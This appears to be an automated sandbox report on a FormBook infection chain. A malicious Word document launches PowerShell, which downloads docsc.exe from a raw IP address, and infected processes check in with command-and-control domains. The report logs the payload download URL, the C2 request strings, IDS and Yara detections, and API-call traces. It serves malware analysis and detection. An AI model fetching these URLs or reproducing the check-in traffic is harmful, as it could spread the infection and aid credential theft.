          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 4x nop then pop ebx
          Source: global traffic | DNS query: name: www.boostcoachingonline.com
          Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 157.55.173.72:80
          Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 157.55.173.72:80

          Networking:

          barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 202.210.8.86:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 202.210.8.86:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 202.210.8.86:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 107.155.89.74:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 107.155.89.74:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 107.155.89.74:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 44.230.85.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 44.230.85.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 44.230.85.241:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.rogegalmish.com/a8si/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.thepocket-onlinelesson.xyz
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 12 May 2021 09:33:33 GMT | Server: Apache/2.4.18 (Ubuntu) | Last-Modified: Wed, 12 May 2021 07:52:57 GMT | ETag: "edc00-5c21d4c824840" | Accept-Ranges: bytes | Content-Length: 973824 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdos-program | Data Raw: (raw hex dump of the returned PE file omitted)
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 12 May 2021 09:33:42 GMT | Server: Apache/2.4.18 (Ubuntu) | Last-Modified: Wed, 12 May 2021 07:52:57 GMT | ETag: "edc00-5c21d4c824840" | Accept-Ranges: bytes | Content-Length: 973824 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdos-program | Data Raw: (raw hex dump of the returned PE file omitted)
Source: global traffic | HTTP traffic detected: GET /goose/docsc.exe HTTP/1.1 | Host: 157.55.173.72 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg== HTTP/1.1 | Host: www.boostcoachingonline.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV HTTP/1.1 | Host: www.thepocket-onlinelesson.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV HTTP/1.1 | Host: www.applewholesales.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg== HTTP/1.1 | Host: www.southernbrushworks.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV HTTP/1.1 | Host: www.betsysellsswfl.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA== HTTP/1.1 | Host: www.ethereumdailypay.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV HTTP/1.1 | Host: www.foreverjsdesigns.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg== HTTP/1.1 | Host: www.4520oceanviewavenue.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 75.2.115.196
Source: Joe Sandbox View | IP Address: 184.168.131.241
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: VECTANTARTERIANetworksCorporationJP
Source: global traffic | HTTP traffic detected: GET /goose/docsc.exe HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 157.55.173.72 | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8ADCC7F3-349E-46EF-BF24-C3A751787722}.tmp
Source: unknown | DNS traffic detected: queries for: www.boostcoachingonline.com
Source: powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp | String found in binary or memory: httP://157.55.
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp | String found in binary or memory: httP://157.55.17
Source: powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp | String found in binary or memory: httP://157.55.173.72/go
Source: powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp | String found in binary or memory: httP://157.55.173.72/goose/do
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp | String found in binary or memory: httP://157.55.173.72/goose/docsc
Source: powershell.exe, 00000008.00000002.2096198856.0000000000340000.00000004.00000020.sdmp | String found in binary or memory: httP://157.55.173.72/goose/docsc.exe
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp | String found in binary or memory: httP://157.55.173.72/goose/docsc.exePE1
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp | String found in binary or memory: http://157.55.173.72
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.2113476855.000000001BA55000.00000004.00000001.sdmp | String found in binary or memory: http://157.55.173.72/goose/docsc.exe
Source: powershell.exe, 00000003.00000002.2100780380.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2096222318.0000000002270000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2097117597.0000000002400000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000003.00000002.2100780380.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2096222318.0000000002270000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2097117597.0000000002400000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000003.00000002.2097620133.000000000034E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2095022345.000000000024E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://KK
Source: powershell.exe, 00000003.00000002.2097620133.000000000034E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2095022345.000000000024E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

          E-Banking Fraud:

          barindex
Yara detected FormBook
Source: Yara match | File source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
Malicious sample detected (through community Yara rule)
Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing when opening. 0 Page: I of 2 Words: 539 N@m 13 ;a 10096 G) FI G) ,, =1'L'm')
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing when opening. O "g"' 0' ' I Wo"" "' I '3 I _ 1@ 13 '00% G) A GE) a 0 m
Source: Screenshot number: 12 | Screenshot OCR: Enable Editing when opening. ii: ^ . . . . . 's . . . . .layer . . . . . . a"t , au'qj . . . ,.
Found suspicious RTF objects
Source: AbctfhgXgdghgh.ScT | Static RTF information: Object: 0 Offset: 00007110h AbctfhgXgdghgh.ScT
Microsoft Office creates scripting files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScT
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe
PE file contains section with special chars
Source: docsc[1].exe.0.dr | Static PE information: section name: U#j;F_`
Source: docsc.exe.3.dr | Static PE information: section name: U#j;F_`
PE file has nameless sections
Source: docsc[1].exe.0.dr | Static PE information: section name:
Source: docsc.exe.3.dr | Static PE information: section name:
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\docsc.exe
Source: C:\Users\user\AppData\Roaming\docsc.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\docsc.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_004181C0 NtCreateFile,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_00418270 NtReadFile,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_004182F0 NtClose,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_004183A0 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0041826A NtReadFile,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0041839A NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_00730078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_007300C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_007307AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072F900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072F9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_00730060 NtQuerySection,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_007310D0 NtOpenProcessToken,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_00731148 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0073010C NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_007301D4 NtSetValueKey,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072F8CC NtWaitForSingleObject,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_00731930 NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072F938 NtWriteFile,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FA50 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FA20 NtQueryInformationFile,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FAB8 NtQueryValueKey,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FB50 NtCreateKey,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FBE8 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_00730C40 NtGetContextThread,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FC48 NtSetInformationFile,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FC30 NtOpenProcess,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FD5C NtEnumerateKey,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_00731D80 NtSuspendThread,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FE24 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FF34 NtQueueApcThread,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0072FFFC NtCreateProcessEx,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_002767C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_002767C2 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 14_2_020A00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 14_2_020A07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_000981C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_00098270 NtReadFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_000982F0 NtClose,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_000983A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009826A NtReadFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009839A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D2450
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6C78
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D1881
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D2CCA
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D04E2
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D4590
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001DC1B0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001DB1A8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D36B0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D5410
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6830
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6821
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D5420
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D4466
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D44A0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001DA1B0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D5210
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6610
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6601
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001DD268
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001DCE68
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6A98
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6AA8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D76DA
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D5FA0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00431170
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00431B58
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004344C8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00436550
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00434D21
